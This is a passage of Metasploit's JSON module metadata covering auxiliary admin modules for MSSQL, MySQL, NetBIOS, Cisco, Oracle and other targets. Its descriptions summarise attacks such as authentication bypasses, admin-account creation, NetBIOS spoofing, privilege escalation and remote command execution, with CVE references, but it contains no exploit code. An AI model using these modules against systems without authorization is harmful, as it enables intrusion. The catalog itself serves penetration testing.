"Microsoft SQL Server Generic Query", - "fullname": "auxiliary/admin/mssql/mssql_sql", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "tebo " - ], - "description": "This module will allow for simple SQL statements to be executed against a\n MSSQL/MSDE instance given the appropriate credentials.", - "references": [ - "URL-http://www.attackresearch.com", - "URL-http://msdn.microsoft.com/en-us/library/cc448435(PROT.10).aspx" - ], - "platform": "", - "arch": "", - "rport": 1433, - "autofilter_ports": [ - 1433, - 1434, - 1435, - 14330, - 2533, - 9152, - 2638 - ], - "autofilter_services": [ - "ms-sql-s", - "ms-sql2000", - "sybase" - ], - "targets": null, - "mod_time": "2024-03-05 13:27:00 +0000", - "path": "/modules/auxiliary/admin/mssql/mssql_sql.rb", - "is_install_path": true, - "ref_name": "admin/mssql/mssql_sql", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "mssql" - ], - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/mssql/mssql_sql_file": { - "name": "Microsoft SQL Server Generic Query from File", - "fullname": "auxiliary/admin/mssql/mssql_sql_file", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "j0hn__f : " - ], - "description": "This module will allow for multiple SQL queries contained within a specified\n file to be executed against a Microsoft SQL (MSSQL) Server instance, given\n the appropriate credentials.", - "references": [], - "platform": "", - "arch": "", - "rport": 1433, - "autofilter_ports": [ - 1433, - 1434, - 1435, - 14330, - 2533, - 9152, - 2638 - ], - "autofilter_services": [ - "ms-sql-s", - "ms-sql2000", - "sybase" - ], - "targets": null, - "mod_time": "2024-03-05 13:27:00 +0000", - "path": "/modules/auxiliary/admin/mssql/mssql_sql_file.rb", - "is_install_path": true, - "ref_name": "admin/mssql/mssql_sql_file", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "mssql" - ], - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/mysql/mysql_enum": { - "name": "MySQL Enumeration Module", - "fullname": "auxiliary/admin/mysql/mysql_enum", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Carlos Perez " - ], - "description": "This module allows for simple enumeration of MySQL Database Server\n provided proper credentials to connect remotely.", - "references": [ - "URL-https://cisecurity.org/benchmarks.html" - ], - "platform": "", - "arch": "", - "rport": 3306, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-03-28 10:34:38 +0000", - "path": "/modules/auxiliary/admin/mysql/mysql_enum.rb", - "is_install_path": true, - "ref_name": "admin/mysql/mysql_enum", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "mysql" - ], - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/mysql/mysql_sql": { - "name": "MySQL SQL Generic Query", - "fullname": "auxiliary/admin/mysql/mysql_sql", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Bernardo Damele A. G. " - ], - "description": "This module allows for simple SQL statements to be executed\n against a MySQL instance given the appropriate credentials.", - "references": [], - "platform": "", - "arch": "", - "rport": 3306, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-02-14 15:26:34 +0000", - "path": "/modules/auxiliary/admin/mysql/mysql_sql.rb", - "is_install_path": true, - "ref_name": "admin/mysql/mysql_sql", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "mysql" - ], - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/natpmp/natpmp_map": { - "name": "NAT-PMP Port Mapper", - "fullname": "auxiliary/admin/natpmp/natpmp_map", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Jon Hart " - ], - "description": "Map (forward) TCP and UDP ports on NAT devices using NAT-PMP", - "references": [], - "platform": "", - "arch": "", - "rport": 5351, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/natpmp/natpmp_map.rb", - "is_install_path": true, - "ref_name": "admin/natpmp/natpmp_map", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/netbios/netbios_spoof": { - "name": "NetBIOS Response Brute Force Spoof (Direct)", - "fullname": "auxiliary/admin/netbios/netbios_spoof", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "vvalien", - "hdm ", - "tombkeeper" - ], - "description": "This module continuously spams NetBIOS responses to a target for given hostname,\n causing the target to cache a malicious address for this name. On high-speed local\n networks, the PPSRATE value should be increased to speed up this attack. As an\n example, a value of around 30,000 is almost 100% successful when spoofing a\n response for a 'WPAD' lookup. Distant targets may require more time and lower\n rates for a successful attack.", - "references": [], - "platform": "", - "arch": "", - "rport": 137, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/netbios/netbios_spoof.rb", - "is_install_path": true, - "ref_name": "admin/netbios/netbios_spoof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/networking/arista_config": { - "name": "Arista Configuration Importer", - "fullname": "auxiliary/admin/networking/arista_config", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "h00die" - ], - "description": "This module imports an Arista device configuration.", - "references": [], - "platform": "", - "arch": "", - "rport": 22, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/auxiliary/admin/networking/arista_config.rb", - "is_install_path": true, - "ref_name": "admin/networking/arista_config", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [], - "Reliability": [], - "SideEffects": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/networking/brocade_config": { - "name": "Brocade Configuration Importer", - "fullname": "auxiliary/admin/networking/brocade_config", - "aliases": [ - "auxiliary/admin/brocade/brocade_config" - ], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "h00die" - ], - "description": "This module imports a Brocade device configuration.", - "references": [], - "platform": "", - "arch": "", - "rport": 22, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-09-22 02:56:51 +0000", - "path": "/modules/auxiliary/admin/networking/brocade_config.rb", - "is_install_path": true, - "ref_name": "admin/networking/brocade_config", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/networking/cisco_asa_extrabacon": { - "name": "Cisco ASA Authentication Bypass (EXTRABACON)", - "fullname": "auxiliary/admin/networking/cisco_asa_extrabacon", - "aliases": [ - "auxiliary/admin/cisco/cisco_asa_extrabacon" - ], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Sean Dillon ", - "Zachary Harding ", - "Nate Caroe ", - "Dylan Davis ", - "William Webb ", - "Jeff Jarmoc ", - "Equation Group", - "Shadow Brokers" - ], - "description": "This module patches the authentication functions of a Cisco ASA\n to allow uncredentialed logins. Uses improved shellcode for payload.", - "references": [ - "CVE-2016-6366", - "URL-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp", - "URL-https://github.com/RiskSense-Ops/CVE-2016-6366" - ], - "platform": "", - "arch": "", - "rport": 161, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2021-08-27 17:15:33 +0000", - "path": "/modules/auxiliary/admin/networking/cisco_asa_extrabacon.rb", - "is_install_path": true, - "ref_name": "admin/networking/cisco_asa_extrabacon", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "AKA": [ - "EXTRABACON" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "PASS_DISABLE", - "description": "Disable password authentication." - }, - { - "name": "PASS_ENABLE", - "description": "Enable password authentication." - } - ] - }, - "auxiliary_admin/networking/cisco_config": { - "name": "Cisco Configuration Importer", - "fullname": "auxiliary/admin/networking/cisco_config", - "aliases": [ - "auxiliary/admin/cisco/cisco_config" - ], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "h00die" - ], - "description": "This module imports a Cisco IOS or NXOS device configuration.", - "references": [], - "platform": "", - "arch": "", - "rport": 22, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-09-22 02:56:51 +0000", - "path": "/modules/auxiliary/admin/networking/cisco_config.rb", - "is_install_path": true, - "ref_name": "admin/networking/cisco_config", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/networking/cisco_dcnm_auth_bypass": { - "name": "Cisco DCNM auth bypass", - "fullname": "auxiliary/admin/networking/cisco_dcnm_auth_bypass", - "aliases": [], - "rank": 300, - "disclosure_date": "2020-06-01", - "type": "auxiliary", - "author": [ - "MR_ME", - "Yann Castel (yann.castel " - ], - "description": "This exploit is able to add an admin account to a Cisco DCNM with credentials you can choose.\n After that, you can login to the web interface with those credentials.\n The only necessary condition is the more or less recent connection of an admin as this exploit\n uses a kind of session stealing.", - "references": [ - "CVE-2019-15975", - "EDB-48018" - ], - "platform": "", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-03-31 23:53:41 +0000", - "path": "/modules/auxiliary/admin/networking/cisco_dcnm_auth_bypass.rb", - "is_install_path": true, - "ref_name": "admin/networking/cisco_dcnm_auth_bypass", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "config-changes" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/networking/cisco_dcnm_download": { - "name": "Cisco Data Center Network Manager Unauthenticated File Download", - "fullname": "auxiliary/admin/networking/cisco_dcnm_download", - "aliases": [ - "auxiliary/admin/cisco/cisco_dcnm_download" - ], - "rank": 300, - "disclosure_date": "2019-06-26", - "type": "auxiliary", - "author": [ - "Pedro Ribeiro " - ], - "description": "DCNM exposes a servlet to download files on /fm/downloadServlet.\n An authenticated user can abuse this servlet to download arbitrary files as root by specifying\n the full path of the file.\n This module was tested on the DCNM Linux virtual appliance 10.4(2), 11.0(1) and 11.1(1), and should\n work on a few versions below 10.4(2). Only version 11.0(1) requires authentication to exploit\n (see References to understand why).", - "references": [ - "CVE-2019-1619", - "CVE-2019-1621", - "URL-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass", - "URL-https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-file-dwnld", - "URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/Cisco/cisco-dcnm-rce.txt", - "URL-https://seclists.org/fulldisclosure/2019/Jul/7" - ], - "platform": "", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2022-01-13 18:55:39 +0000", - "path": "/modules/auxiliary/admin/networking/cisco_dcnm_download.rb", - "is_install_path": true, - "ref_name": "admin/networking/cisco_dcnm_download", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/networking/cisco_secure_acs_bypass": { - "name": "Cisco Secure ACS Unauthorized Password Change", - "fullname": "auxiliary/admin/networking/cisco_secure_acs_bypass", - "aliases": [ - "auxiliary/admin/cisco/cisco_secure_acs_bypass" - ], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Jason Kratzer " - ], - "description": "This module exploits an authentication bypass issue which allows arbitrary\n password change requests to be issued for any user in the local store.\n Instances of Secure ACS running version 5.1 with patches 3, 4, or 5 as well\n as version 5.2 with either no patches or patches 1 and 2 are vulnerable.", - "references": [ - "BID-47093", - "CVE-2011-0951", - "URL-http://www.cisco.com/en/US/products/csa/cisco-sa-20110330-acs.html" - ], - "platform": "", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2020-07-16 05:43:52 +0000", - "path": "/modules/auxiliary/admin/networking/cisco_secure_acs_bypass.rb", - "is_install_path": true, - "ref_name": "admin/networking/cisco_secure_acs_bypass", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/networking/cisco_vpn_3000_ftp_bypass": { - "name": "Cisco VPN Concentrator 3000 FTP Unauthorized Administrative Access", - "fullname": "auxiliary/admin/networking/cisco_vpn_3000_ftp_bypass", - "aliases": [ - "auxiliary/admin/cisco/vpn_3000_ftp_bypass" - ], - "rank": 300, - "disclosure_date": "2006-08-23", - "type": "auxiliary", - "author": [ - "aushack " - ], - "description": "This module tests for a logic vulnerability in the Cisco VPN Concentrator\n 3000 series. It is possible to execute some FTP statements without authentication\n (CWD, RNFR, MKD, RMD, SIZE, CDUP). It also appears to have some memory leak bugs\n when working with CWD commands. This module simply creates an arbitrary directory,\n verifies that the directory has been created, then deletes it and verifies deletion\n to confirm the bug.", - "references": [ - "BID-19680", - "CVE-2006-4313", - "OSVDB-28139", - "OSVDB-28138" - ], - "platform": "", - "arch": "", - "rport": 21, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-07-24 16:42:43 +0000", - "path": "/modules/auxiliary/admin/networking/cisco_vpn_3000_ftp_bypass.rb", - "is_install_path": true, - "ref_name": "admin/networking/cisco_vpn_3000_ftp_bypass", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/networking/f5_config": { - "name": "F5 Configuration Importer", - "fullname": "auxiliary/admin/networking/f5_config", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "h00die" - ], - "description": "This module imports an F5 device configuration.", - "references": [], - "platform": "", - "arch": "", - "rport": 22, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/auxiliary/admin/networking/f5_config.rb", - "is_install_path": true, - "ref_name": "admin/networking/f5_config", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [], - "SideEffects": [], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/networking/juniper_config": { - "name": "Juniper Configuration Importer", - "fullname": "auxiliary/admin/networking/juniper_config", - "aliases": [ - "auxiliary/admin/juniper/juniper_config" - ], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "h00die" - ], - "description": "This module imports a Juniper ScreenOS or JunOS device configuration.", - "references": [], - "platform": "", - "arch": "", - "rport": 22, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/auxiliary/admin/networking/juniper_config.rb", - "is_install_path": true, - "ref_name": "admin/networking/juniper_config", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [], - "SideEffects": [], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "JUNOS", - "description": "Import JunOS Config File" - }, - { - "name": "SCREENOS", - "description": "Import ScreenOS Config File" - } - ] - }, - "auxiliary_admin/networking/mikrotik_config": { - "name": "Mikrotik Configuration Importer", - "fullname": "auxiliary/admin/networking/mikrotik_config", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "h00die" - ], - "description": "This module imports a Mikrotik device configuration.", - "references": [], - "platform": "", - "arch": "", - "rport": 22, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/auxiliary/admin/networking/mikrotik_config.rb", - "is_install_path": true, - "ref_name": "admin/networking/mikrotik_config", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [], - "SideEffects": [], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "ROUTEROS", - "description": "Import RouterOS Config File" - }, - { - "name": "SWOS", - "description": "Import SwOS Config File" - } - ] - }, - "auxiliary_admin/networking/ubiquiti_config": { - "name": "Ubiquiti Configuration Importer", - "fullname": "auxiliary/admin/networking/ubiquiti_config", - "aliases": [ - "auxiliary/admin/ubiquiti/ubiquiti_config" - ], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "h00die" - ], - "description": "This module imports an Ubiquiti device configuration.\n The db file within the .unf backup is the data file for\n Unifi. This module can take either the db file or .unf.", - "references": [], - "platform": "", - "arch": "", - "rport": 22, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-03-23 11:32:45 +0000", - "path": "/modules/auxiliary/admin/networking/ubiquiti_config.rb", - "is_install_path": true, - "ref_name": "admin/networking/ubiquiti_config", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [], - "SideEffects": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/networking/vyos_config": { - "name": "VyOS Configuration Importer", - "fullname": "auxiliary/admin/networking/vyos_config", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "h00die" - ], - "description": "This module imports a VyOS device configuration.", - "references": [], - "platform": "", - "arch": "", - "rport": 22, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2023-02-03 18:12:53 +0000", - "path": "/modules/auxiliary/admin/networking/vyos_config.rb", - "is_install_path": true, - "ref_name": "admin/networking/vyos_config", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/officescan/tmlisten_traversal": { - "name": "TrendMicro OfficeScanNT Listener Traversal Arbitrary File Access", - "fullname": "auxiliary/admin/officescan/tmlisten_traversal", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Anshul Pandey ", - "aushack " - ], - "description": "This module tests for directory traversal vulnerability in the UpdateAgent\n function in the OfficeScanNT Listener (TmListen.exe) service in Trend Micro\n OfficeScan. This allows remote attackers to read arbitrary files as SYSTEM\n via dot dot sequences in an HTTP request.", - "references": [ - "OSVDB-48730", - "CVE-2008-2439", - "BID-31531", - "URL-http://www.trendmicro.com/ftp/documentation/readme/OSCE_7.3_Win_EN_CriticalPatch_B1372_Readme.txt" - ], - "platform": "", - "arch": "", - "rport": 26122, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2017-11-09 03:00:24 +0000", - "path": "/modules/auxiliary/admin/officescan/tmlisten_traversal.rb", - "is_install_path": true, - "ref_name": "admin/officescan/tmlisten_traversal", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/oracle/ora_ntlm_stealer": { - "name": "Oracle SMB Relay Code Execution", - "fullname": "auxiliary/admin/oracle/ora_ntlm_stealer", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-04-07", - "type": "auxiliary", - "author": [ - "Sh2kerr " - ], - "description": "This module will help you to get Administrator access to OS using an unprivileged\n Oracle database user (you need only CONNECT and RESOURCE privileges).\n To do this you must firstly run smb_sniffer or smb_relay module on your sever.\n Then you must connect to Oracle database and run this module Ora_NTLM_stealer.rb\n which will connect to your SMB sever with credentials of Oracle RDBMS.\n So if smb_relay is working, you will get Administrator access to server which\n runs Oracle. If not than you can decrypt HALFLM hash.", - "references": [ - "URL-http://dsecrg.com/pages/pub/show.php?id=17" - ], - "platform": "", - "arch": "", - "rport": 1521, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb", - "is_install_path": true, - "ref_name": "admin/oracle/ora_ntlm_stealer", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/oracle/oracle_index_privesc": { - "name": "Oracle DB Privilege Escalation via Function-Based Index", - "fullname": "auxiliary/admin/oracle/oracle_index_privesc", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-01-21", - "type": "auxiliary", - "author": [ - "David Litchfield", - "Moshe Kaplan" - ], - "description": "This module will escalate an Oracle DB user to DBA by creating a\n function-based index on a table owned by a more-privileged user.\n Credits to David Litchfield for publishing the technique.", - "references": [ - "URL-http://www.davidlitchfield.com/Privilege_Escalation_via_Oracle_Indexes.pdf" - ], - "platform": "", - "arch": "", - "rport": 1521, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/admin/oracle/oracle_index_privesc.rb", - "is_install_path": true, - "ref_name": "admin/oracle/oracle_index_privesc", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/oracle/oracle_login": { - "name": "Oracle Account Discovery", - "fullname": "auxiliary/admin/oracle/oracle_login", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-11-20", - "type": "auxiliary", - "author": [ - "MC " - ], - "description": "This module uses a list of well known default authentication credentials\n to discover easily guessed accounts.", - "references": [ - "URL-http://www.petefinnigan.com/default/oracle_default_passwords.csv", - "URL-https://seclists.org/fulldisclosure/2009/Oct/261" - ], - "platform": "", - "arch": "", - "rport": 1521, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/admin/oracle/oracle_login.rb", - "is_install_path": true, - "ref_name": "admin/oracle/oracle_login", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/oracle/oracle_sql": { - "name": "Oracle SQL Generic Query", - "fullname": "auxiliary/admin/oracle/oracle_sql", - "aliases": [], - "rank": 300, - "disclosure_date": "2007-12-07", - "type": "auxiliary", - "author": [ - "MC " - ], - "description": "This module allows for simple SQL statements to be executed\n against an Oracle instance given the appropriate credentials\n and sid.", - "references": [ - "URL-http://web.archive.org/web/20110322124810/http://www.metasploit.com:80/users/mc/" - ], - "platform": "", - "arch": "", - "rport": 1521, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/auxiliary/admin/oracle/oracle_sql.rb", - "is_install_path": true, - "ref_name": "admin/oracle/oracle_sql", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/oracle/oraenum": { - "name": "Oracle Database Enumeration", - "fullname": "auxiliary/admin/oracle/oraenum", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Carlos Perez " - ], - "description": "This module provides a simple way to scan an Oracle database server\n for configuration parameters that may be useful during a penetration\n test. Valid database credentials must be provided for this module to\n run.", - "references": [], - "platform": "", - "arch": "", - "rport": 1521, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/oracle/oraenum.rb", - "is_install_path": true, - "ref_name": "admin/oracle/oraenum", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/oracle/osb_execqr": { - "name": "Oracle Secure Backup exec_qr() Command Injection Vulnerability", - "fullname": "auxiliary/admin/oracle/osb_execqr", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-01-14", - "type": "auxiliary", - "author": [ - "MC " - ], - "description": "This module exploits a command injection vulnerability in Oracle Secure Backup version 10.1.0.3 to 10.2.0.2.", - "references": [ - "CVE-2008-5448", - "OSVDB-51342", - "URL-http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html", - "ZDI-09-003" - ], - "platform": "", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/admin/oracle/osb_execqr.rb", - "is_install_path": true, - "ref_name": "admin/oracle/osb_execqr", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/oracle/osb_execqr2": { - "name": "Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability", - "fullname": "auxiliary/admin/oracle/osb_execqr2", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-08-18", - "type": "auxiliary", - "author": [ - "MC " - ], - "description": "This module exploits an authentication bypass vulnerability\n in login.php in order to execute arbitrary code via a command injection\n vulnerability in property_box.php. This module was tested\n against Oracle Secure Backup version 10.3.0.1.0 (Win32).", - "references": [ - "CVE-2009-1977", - "OSVDB-55903", - "CVE-2009-1978", - "OSVDB-55904", - "ZDI-09-058", - "ZDI-09-059" - ], - "platform": "", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/admin/oracle/osb_execqr2.rb", - "is_install_path": true, - "ref_name": "admin/oracle/osb_execqr2", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/oracle/osb_execqr3": { - "name": "Oracle Secure Backup Authentication Bypass/Command Injection Vulnerability", - "fullname": "auxiliary/admin/oracle/osb_execqr3", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-07-13", - "type": "auxiliary", - "author": [ - "MC " - ], - "description": "This module exploits an authentication bypass vulnerability\n in login.php in order to execute arbitrary code via a command injection\n vulnerability in property_box.php. This module was tested\n against Oracle Secure Backup version 10.3.0.1.0 (Win32).", - "references": [ - "CVE-2010-0904", - "OSVDB-66338", - "ZDI-10-118" - ], - "platform": "", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/admin/oracle/osb_execqr3.rb", - "is_install_path": true, - "ref_name": "admin/oracle/osb_execqr3", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/oracle/post_exploitation/win32exec": { - "name": "Oracle Java execCommand (Win32)", - "fullname": "auxiliary/admin/oracle/post_exploitation/win32exec", - "aliases": [], - "rank": 300, - "disclosure_date": "2007-12-07", - "type": "auxiliary", - "author": [ - "MC " - ], - "description": "This module will create a java class which enables the execution of OS commands.", - "references": [ - "URL-http://web.archive.org/web/20110322124810/http://www.metasploit.com:80/users/mc/" - ], - "platform": "", - "arch": "", - "rport": 1521, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/auxiliary/admin/oracle/post_exploitation/win32exec.rb", - "is_install_path": true, - "ref_name": "admin/oracle/post_exploitation/win32exec", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/oracle/post_exploitation/win32upload": { - "name": "Oracle URL Download", - "fullname": "auxiliary/admin/oracle/post_exploitation/win32upload", - "aliases": [], - "rank": 300, - "disclosure_date": "2005-02-10", - "type": "auxiliary", - "author": [ - "CG " - ], - "description": "This module will create a java class which enables the download\n of a binary from a webserver to the oracle filesystem.", - "references": [ - "URL-http://www.argeniss.com/research/oraclesqlinj.zip" - ], - "platform": "", - "arch": "", - "rport": 1521, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb", - "is_install_path": true, - "ref_name": "admin/oracle/post_exploitation/win32upload", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/oracle/sid_brute": { - "name": "Oracle TNS Listener SID Brute Forcer", - "fullname": "auxiliary/admin/oracle/sid_brute", - 